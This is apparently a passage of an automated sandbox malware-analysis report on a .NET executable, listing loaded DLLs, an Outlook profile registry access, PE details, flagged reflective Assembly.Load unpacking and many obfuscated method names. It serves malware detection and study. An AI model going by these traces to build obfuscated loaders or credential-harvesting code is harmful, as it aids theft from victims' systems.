                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeProcess created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: XFo9jVGyLQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: XFo9jVGyLQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: XFo9jVGyLQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: APWe.pdb source: XFo9jVGyLQ.exe
                Source: Binary string: APWe.pdbSHA2564 source: XFo9jVGyLQ.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs.Net Code: NiM4mycMYo System.Reflection.Assembly.Load(byte[])
                Source: 0.2.XFo9jVGyLQ.exe.41ba508.3.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs.Net Code: NiM4mycMYo System.Reflection.Assembly.Load(byte[])
                Source: 0.2.XFo9jVGyLQ.exe.41da528.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs.Net Code: NiM4mycMYo System.Reflection.Assembly.Load(byte[])
                Source: XFo9jVGyLQ.exeStatic PE information: 0xAD89030B [Wed Apr 5 04:39:39 2062 UTC]
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_07667750 push cs; ret 0_2_07667751
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0787028A pushad ; ret 0_2_07870299
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0787D0FD push FFFFFF8Bh; iretd 0_2_0787D0FF
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 0_2_0787B9A8 push esp; ret 0_2_0787B9ED
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 1_2_0673890D push es; ret 1_2_06738920
                Source: XFo9jVGyLQ.exeStatic PE information: section name: .text entropy: 7.766159248335199
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, TKlhyyuHllX5xyhmu0.csHigh entropy of concatenated method names: 'ToString', 'p1VXhRa7R1', 'ATqX3QlSUW', 'BMAXSrPr0X', 'lmvXaSkr5t', 'IE0XpvWujx', 'PUjXk4wMjc', 'nhWX9QXYCe', 'oYYXteI0ev', 'vBcXb1UlDE'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, In9xe9q4VPmZ13gRAeD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AxTeL7aGP6', 'DTKe8lUrX1', 'IMdeJMIpHN', 'beYeep46u0', 'eyGe20EEuT', 'Q4veAitLTf', 'OSqe02bimd'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, HYu8KTKNHIOYhAZOIS.csHigh entropy of concatenated method names: 'KYZnD835yU', 'oY4ni6CSDR', 'QZD5yRrXGg', 'Ogs5qoPurV', 'HLSnhEKEaA', 'NyrnWFDQOg', 'FgunEqxdBo', 'N94nZaE9KO', 'xVLnckD0oF', 'Hf3nuglNAF'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, t5Qc6FEcD6PZ7vgsIT.csHigh entropy of concatenated method names: 'KS0o6Gi6mO', 'mHrosHpcmI', 'v35odD0D3R', 'vvao3bBbig', 'nvloaHwVyh', 'o1WopgLQAW', 'FBbo9223wB', 'hxKotorkpW', 'YVSoVPQhpQ', 'YlMohgNb8n'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E07llS6X8rtulXNqpw.csHigh entropy of concatenated method names: 'AoiwZckb7T', 'w5bwceUkYW', 'pMLwuurVF7', 'anDw79StNi', 'JrBwPBvJNW', 'YPmwKCE783', 'LKNw1jmtPU', 'pIRwD2LokG', 'pIwwr6KIQi', 'DeKwijANxr'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, gJ0MwAqy0rm5YlKHTad.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JZU8hSkV4a', 'ac58W6OOaO', 'EIJ8EcU0yc', 't6t8ZGto9F', 'vQR8cpL9fa', 'pt98uOgJDe', 'id187vNn9k'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, RmccBRspdjIa6yA0yR.csHigh entropy of concatenated method names: 'iuMxIvewxh', 'dmkxTEH3tC', 'hhtx6P1X03', 'kmLxsPyA0r', 'AAExgeZHUv', 'G4yxXDE36y', 'cTQxndLAbE', 'IaDx5Qw4sE', 'ugdxLjXPYW', 'IcNx8fTS10'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, XMj0lhrZosjVL5Hnup.csHigh entropy of concatenated method names: 'PqnLdNMyVY', 'p3FL3NwAVx', 'hwXLSbr8pb', 'AXhLaMSW3M', 'uAXLpqBYE4', 'cYJLkqWUqx', 'mgML97VXRn', 'q6PLtKWsMg', 'z5nLbGVYB3', 'qBpLVSVIjJ'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, Hhb2ZC4YUjOmRhv7c7.csHigh entropy of concatenated method names: 'QfsqB07llS', 'p8rqQtulXN', 'lpdqOjIa6y', 'w0yqMR67VW', 'J7pqg6JeQu', 'RWeqXtc7m6', 'DqYEsar00IfXho5INC', 'BhPsCMJANpf4C0Y8tr', 'ajuqqUe22A', 'idCqNJb9uQ'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, uQucWedtc7m6UiYPOo.csHigh entropy of concatenated method names: 'tvnFUiRwGd', 'RkfFw6wcnY', 'Jb7FlvuRbe', 'iETFB9d7fK', 'YrIFQiw8XX', 'H9nlPmIucc', 'DnklKTeWMK', 'bl9l1xak2B', 'gqklDcJTvq', 'XSxlrd8Jqj'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E7VWmfYfPvWACp7p6J.csHigh entropy of concatenated method names: 'wK8ljssXjt', 'RiylG0ScCe', 'TSPxSxXd2t', 'OVVxa5F1Oa', 'z1gxpuUUWc', 'MRIxk2oxaH', 'kkbx9a7Y29', 'PCwxtFYGHo', 'HntxbvqvYF', 'MeZxVJPHEl'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.csHigh entropy of concatenated method names: 'jH6NU1CWAj', 'wTONCGh8gw', 'Y9INwcIEdD', 'u0mNxu2TAw', 'oAHNl5EXGI', 'fcNNFhEe20', 'FIeNBg6MJi', 'xCSNQJvrfo', 'm02NRuykp2', 'vMuNOSj35h'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, b5oFPOf2vlQ1ZEjA8v.csHigh entropy of concatenated method names: 'y6JmoyuHl', 'igMI2eKYH', 'uC6TMVY3C', 'CpuGV1qSV', 'xsZsCYrtk', 'z21YYwgrv', 'WGT5CpgNNveMuwfRrZ', 'DK4NrwpojBfip71UpI', 'qO05bjOyn', 'eii8JfH3e'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, VOuXCE97qsitDL1GgQ.csHigh entropy of concatenated method names: 'yoYBCU5Hk0', 't7VBxn38fU', 'EeyBFyc4mr', 'rGMFiwiE2F', 'yNAFzrQbqp', 'jJlByhD116', 'c32BqobNbP', 'RmBBfeS2bJ', 'U8MBNpRZyK', 'c32B4hCMSv'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, b64V8t184eaYoo2HhK.csHigh entropy of concatenated method names: 'Qa0LgRFUMB', 'kAoLnAb7Il', 'a7xLLpTVKr', 'G5yLJtDuj1', 'cihL2Ujtde', 'XMjL031YE0', 'Dispose', 'eVR5CgGZv9', 'Ee85waoFjg', 'DV35xLCKuI'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, LyLaCZip3tWf5ab9h4.csHigh entropy of concatenated method names: 'Hnv8xnJkFA', 'nKn8leLqE3', 'tap8FvyqHN', 'WwW8B3COgG', 'TLV8L0YcN3', 'Fom8QL1YRP', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, AnULCawIAmCoqBP8v9.csHigh entropy of concatenated method names: 'Dispose', 'uaYqroo2Hh', 'suxf3fk9m4', 'eJ7hQugY8e', 'VWKqiFOWBM', 'ab5qzObivJ', 'ProcessDialogKey', 'eErfyMj0lh', 'QosfqjVL5H', 'pupfftyLaC'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, snwcIKZHHh0k4nThpr.csHigh entropy of concatenated method names: 'yrsgVHV0LB', 'IJDgWAXRU6', 'PxHgZ8p30r', 'BACgclYqU9', 'mAmg3Mw9L5', 'to7gSu06S4', 'YeIgaktcrh', 'whjgpeDm5M', 't3ugkCO7D7', 'PfLg92pj0q'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, dQt9iNbukrodAWAhaT.csHigh entropy of concatenated method names: 'PtrBHOwqgF', 'YcdBvtuYFf', 'evZBma2gNQ', 'sIOBIg1s5T', 'cjrBjmq5Gm', 'y5yBTNHmAj', 'SsyBG44iaX', 'l6FB6Yp64h', 'rv7BsQk44q', 'A8NBYm15bZ'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, pQZLLezc6UJDoHSEDY.csHigh entropy of concatenated method names: 'uQa8TXpHbG', 'kMv86L2yVU', 'omS8skbICL', 'LtS8ddA1md', 'jQy83Qqrb6', 'jlH8aZaCYk', 'ABc8pttQ9H', 'hnJ80brbda', 'WLW8HIlnFc', 'mhI8vtyiF6'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, pGwGNUqqWm3APL9IIGA.csHigh entropy of concatenated method names: 'Kda8i1O4Xv', 'v2v8zvFmbf', 'cBJJylL4le', 'wMYJqxaLJF', 'R3dJfNKyLj', 'qToJNfAg9R', 'GpyJ4TXcSZ', 'vqZJUdYDiy', 'RhJJCe7GlN', 'o8VJwTMNQe'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, TKlhyyuHllX5xyhmu0.csHigh entropy of concatenated method names: 'ToString', 'p1VXhRa7R1', 'ATqX3QlSUW', 'BMAXSrPr0X', 'lmvXaSkr5t', 'IE0XpvWujx', 'PUjXk4wMjc', 'nhWX9QXYCe', 'oYYXteI0ev', 'vBcXb1UlDE'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, In9xe9q4VPmZ13gRAeD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AxTeL7aGP6', 'DTKe8lUrX1', 'IMdeJMIpHN', 'beYeep46u0', 'eyGe20EEuT', 'Q4veAitLTf', 'OSqe02bimd'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, HYu8KTKNHIOYhAZOIS.csHigh entropy of concatenated method names: 'KYZnD835yU', 'oY4ni6CSDR', 'QZD5yRrXGg', 'Ogs5qoPurV', 'HLSnhEKEaA', 'NyrnWFDQOg', 'FgunEqxdBo', 'N94nZaE9KO', 'xVLnckD0oF', 'Hf3nuglNAF'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, t5Qc6FEcD6PZ7vgsIT.csHigh entropy of concatenated method names: 'KS0o6Gi6mO', 'mHrosHpcmI', 'v35odD0D3R', 'vvao3bBbig', 'nvloaHwVyh', 'o1WopgLQAW', 'FBbo9223wB', 'hxKotorkpW', 'YVSoVPQhpQ', 'YlMohgNb8n'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E07llS6X8rtulXNqpw.csHigh entropy of concatenated method names: 'AoiwZckb7T', 'w5bwceUkYW', 'pMLwuurVF7', 'anDw79StNi', 'JrBwPBvJNW', 'YPmwKCE783', 'LKNw1jmtPU', 'pIRwD2LokG', 'pIwwr6KIQi', 'DeKwijANxr'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, gJ0MwAqy0rm5YlKHTad.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JZU8hSkV4a', 'ac58W6OOaO', 'EIJ8EcU0yc', 't6t8ZGto9F', 'vQR8cpL9fa', 'pt98uOgJDe', 'id187vNn9k'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, RmccBRspdjIa6yA0yR.csHigh entropy of concatenated method names: 'iuMxIvewxh', 'dmkxTEH3tC', 'hhtx6P1X03', 'kmLxsPyA0r', 'AAExgeZHUv', 'G4yxXDE36y', 'cTQxndLAbE', 'IaDx5Qw4sE', 'ugdxLjXPYW', 'IcNx8fTS10'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, XMj0lhrZosjVL5Hnup.csHigh entropy of concatenated method names: 'PqnLdNMyVY', 'p3FL3NwAVx', 'hwXLSbr8pb', 'AXhLaMSW3M', 'uAXLpqBYE4', 'cYJLkqWUqx', 'mgML97VXRn', 'q6PLtKWsMg', 'z5nLbGVYB3', 'qBpLVSVIjJ'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, Hhb2ZC4YUjOmRhv7c7.csHigh entropy of concatenated method names: 'QfsqB07llS', 'p8rqQtulXN', 'lpdqOjIa6y', 'w0yqMR67VW', 'J7pqg6JeQu', 'RWeqXtc7m6', 'DqYEsar00IfXho5INC', 'BhPsCMJANpf4C0Y8tr', 'ajuqqUe22A', 'idCqNJb9uQ'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, uQucWedtc7m6UiYPOo.csHigh entropy of concatenated method names: 'tvnFUiRwGd', 'RkfFw6wcnY', 'Jb7FlvuRbe', 'iETFB9d7fK', 'YrIFQiw8XX', 'H9nlPmIucc', 'DnklKTeWMK', 'bl9l1xak2B', 'gqklDcJTvq', 'XSxlrd8Jqj'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E7VWmfYfPvWACp7p6J.csHigh entropy of concatenated method names: 'wK8ljssXjt', 'RiylG0ScCe', 'TSPxSxXd2t', 'OVVxa5F1Oa', 'z1gxpuUUWc', 'MRIxk2oxaH', 'kkbx9a7Y29', 'PCwxtFYGHo', 'HntxbvqvYF', 'MeZxVJPHEl'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.csHigh entropy of concatenated method names: 'jH6NU1CWAj', 'wTONCGh8gw', 'Y9INwcIEdD', 'u0mNxu2TAw', 'oAHNl5EXGI', 'fcNNFhEe20', 'FIeNBg6MJi', 'xCSNQJvrfo', 'm02NRuykp2', 'vMuNOSj35h'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, b5oFPOf2vlQ1ZEjA8v.csHigh entropy of concatenated method names: 'y6JmoyuHl', 'igMI2eKYH', 'uC6TMVY3C', 'CpuGV1qSV', 'xsZsCYrtk', 'z21YYwgrv', 'WGT5CpgNNveMuwfRrZ', 'DK4NrwpojBfip71UpI', 'qO05bjOyn', 'eii8JfH3e'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, VOuXCE97qsitDL1GgQ.csHigh entropy of concatenated method names: 'yoYBCU5Hk0', 't7VBxn38fU', 'EeyBFyc4mr', 'rGMFiwiE2F', 'yNAFzrQbqp', 'jJlByhD116', 'c32BqobNbP', 'RmBBfeS2bJ', 'U8MBNpRZyK', 'c32B4hCMSv'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, b64V8t184eaYoo2HhK.csHigh entropy of concatenated method names: 'Qa0LgRFUMB', 'kAoLnAb7Il', 'a7xLLpTVKr', 'G5yLJtDuj1', 'cihL2Ujtde', 'XMjL031YE0', 'Dispose', 'eVR5CgGZv9', 'Ee85waoFjg', 'DV35xLCKuI'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, LyLaCZip3tWf5ab9h4.csHigh entropy of concatenated method names: 'Hnv8xnJkFA', 'nKn8leLqE3', 'tap8FvyqHN', 'WwW8B3COgG', 'TLV8L0YcN3', 'Fom8QL1YRP', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, AnULCawIAmCoqBP8v9.csHigh entropy of concatenated method names: 'Dispose', 'uaYqroo2Hh', 'suxf3fk9m4', 'eJ7hQugY8e', 'VWKqiFOWBM', 'ab5qzObivJ', 'ProcessDialogKey', 'eErfyMj0lh', 'QosfqjVL5H', 'pupfftyLaC'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, snwcIKZHHh0k4nThpr.csHigh entropy of concatenated method names: 'yrsgVHV0LB', 'IJDgWAXRU6', 'PxHgZ8p30r', 'BACgclYqU9', 'mAmg3Mw9L5', 'to7gSu06S4', 'YeIgaktcrh', 'whjgpeDm5M', 't3ugkCO7D7', 'PfLg92pj0q'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, dQt9iNbukrodAWAhaT.csHigh entropy of concatenated method names: 'PtrBHOwqgF', 'YcdBvtuYFf', 'evZBma2gNQ', 'sIOBIg1s5T', 'cjrBjmq5Gm', 'y5yBTNHmAj', 'SsyBG44iaX', 'l6FB6Yp64h', 'rv7BsQk44q', 'A8NBYm15bZ'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, pQZLLezc6UJDoHSEDY.csHigh entropy of concatenated method names: 'uQa8TXpHbG', 'kMv86L2yVU', 'omS8skbICL', 'LtS8ddA1md', 'jQy83Qqrb6', 'jlH8aZaCYk', 'ABc8pttQ9H', 'hnJ80brbda', 'WLW8HIlnFc', 'mhI8vtyiF6'
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, pGwGNUqqWm3APL9IIGA.csHigh entropy of concatenated method names: 'Kda8i1O4Xv', 'v2v8zvFmbf', 'cBJJylL4le', 'wMYJqxaLJF', 'R3dJfNKyLj', 'qToJNfAg9R', 'GpyJ4TXcSZ', 'vqZJUdYDiy', 'RhJJCe7GlN', 'o8VJwTMNQe'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, TKlhyyuHllX5xyhmu0.csHigh entropy of concatenated method names: 'ToString', 'p1VXhRa7R1', 'ATqX3QlSUW', 'BMAXSrPr0X', 'lmvXaSkr5t', 'IE0XpvWujx', 'PUjXk4wMjc', 'nhWX9QXYCe', 'oYYXteI0ev', 'vBcXb1UlDE'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, In9xe9q4VPmZ13gRAeD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AxTeL7aGP6', 'DTKe8lUrX1', 'IMdeJMIpHN', 'beYeep46u0', 'eyGe20EEuT', 'Q4veAitLTf', 'OSqe02bimd'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, HYu8KTKNHIOYhAZOIS.csHigh entropy of concatenated method names: 'KYZnD835yU', 'oY4ni6CSDR', 'QZD5yRrXGg', 'Ogs5qoPurV', 'HLSnhEKEaA', 'NyrnWFDQOg', 'FgunEqxdBo', 'N94nZaE9KO', 'xVLnckD0oF', 'Hf3nuglNAF'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, t5Qc6FEcD6PZ7vgsIT.csHigh entropy of concatenated method names: 'KS0o6Gi6mO', 'mHrosHpcmI', 'v35odD0D3R', 'vvao3bBbig', 'nvloaHwVyh', 'o1WopgLQAW', 'FBbo9223wB', 'hxKotorkpW', 'YVSoVPQhpQ', 'YlMohgNb8n'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E07llS6X8rtulXNqpw.csHigh entropy of concatenated method names: 'AoiwZckb7T', 'w5bwceUkYW', 'pMLwuurVF7', 'anDw79StNi', 'JrBwPBvJNW', 'YPmwKCE783', 'LKNw1jmtPU', 'pIRwD2LokG', 'pIwwr6KIQi', 'DeKwijANxr'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, gJ0MwAqy0rm5YlKHTad.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JZU8hSkV4a', 'ac58W6OOaO', 'EIJ8EcU0yc', 't6t8ZGto9F', 'vQR8cpL9fa', 'pt98uOgJDe', 'id187vNn9k'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, RmccBRspdjIa6yA0yR.csHigh entropy of concatenated method names: 'iuMxIvewxh', 'dmkxTEH3tC', 'hhtx6P1X03', 'kmLxsPyA0r', 'AAExgeZHUv', 'G4yxXDE36y', 'cTQxndLAbE', 'IaDx5Qw4sE', 'ugdxLjXPYW', 'IcNx8fTS10'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, XMj0lhrZosjVL5Hnup.csHigh entropy of concatenated method names: 'PqnLdNMyVY', 'p3FL3NwAVx', 'hwXLSbr8pb', 'AXhLaMSW3M', 'uAXLpqBYE4', 'cYJLkqWUqx', 'mgML97VXRn', 'q6PLtKWsMg', 'z5nLbGVYB3', 'qBpLVSVIjJ'
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, Hhb2ZC4YUjOmRhv7c7.csHigh entropy of concatenated method names: 'QfsqB07llS', 'p8rqQtulXN', 'lpdqOjIa6y', 'w0yqMR67VW', 'J7pqg6JeQu', 'RWeqXtc7m6', 'DqYEsar00IfXho5INC', 'BhPsCMJANpf4C0Y8tr', 'ajuqqUe22A', 'idCqNJb9uQ'
